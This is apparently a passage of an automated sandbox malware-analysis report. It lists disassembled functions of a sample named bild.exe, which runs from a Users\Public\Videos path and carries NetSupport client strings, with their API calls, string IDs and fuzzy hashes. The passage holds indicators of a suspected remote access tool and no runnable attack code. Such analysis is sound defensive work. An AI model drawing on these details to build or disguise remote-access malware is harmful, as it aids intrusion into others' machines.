                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                      • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                      • API String ID: 3360349984-1136101629
                                                                                      • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                      • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                      • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                      • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                      Function 11031960 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf
                                                                                      • String ID: %s%s%s.bin$405464$_HF$_HW$_SW
                                                                                      • API String ID: 2111968516-2617670440
                                                                                      • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                      • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                      • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                      • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                      Function 11102AB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                      • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                      • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                      • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                      • String ID: NSMDesktopWnd
                                                                                      • API String ID: 2669163067-206650970
                                                                                      • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                      • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                      • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                      • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                      Function 1113CC30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                      • KillTimer.USER32(00000000,00007F58,TermUI...), ref: 1113CCB3
                                                                                      • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113CD2B
                                                                                      • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeKillLibraryTimer
                                                                                      • String ID: TermUI
                                                                                      • API String ID: 2006562601-4085834059
                                                                                      • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                      • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                      • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                      • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                      Function 11145330 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                      • API String ID: 47109696-3245241687
                                                                                      • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                      • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                      • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                      • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                      Function 111114D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                        • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                        • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                      • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                      • API String ID: 806825551-1858614750
                                                                                      • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                      • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                      • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                      • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                      Function 11144200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                        • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                      • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                      • ResetEvent.KERNEL32(00000260), ref: 11144269
                                                                                      • SetEvent.KERNEL32(00000260), ref: 1114427F
                                                                                      • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                      • String ID: MiniDump
                                                                                      • API String ID: 1494854734-2840755058
                                                                                      • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                      • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                      • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                      • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                      Function 11146DA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                      • wsprintfA.USER32 ref: 11146E06
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                      • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                      • API String ID: 1985783259-2296142801
                                                                                      • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                      • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                      • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                      • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                      Function 1110F420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                      • wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • _memset.LIBCMT ref: 1110F477
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                      • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                      • API String ID: 3234921582-2664294811
                                                                                      • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                      • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                      • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                      • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                      Function 11145AE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                        • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                        • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                        • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                      • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                      • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                      • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                      • API String ID: 1108920153-1959555903
                                                                                      • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                      • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                      • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                      • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                      Function 11031870 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 11031926
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
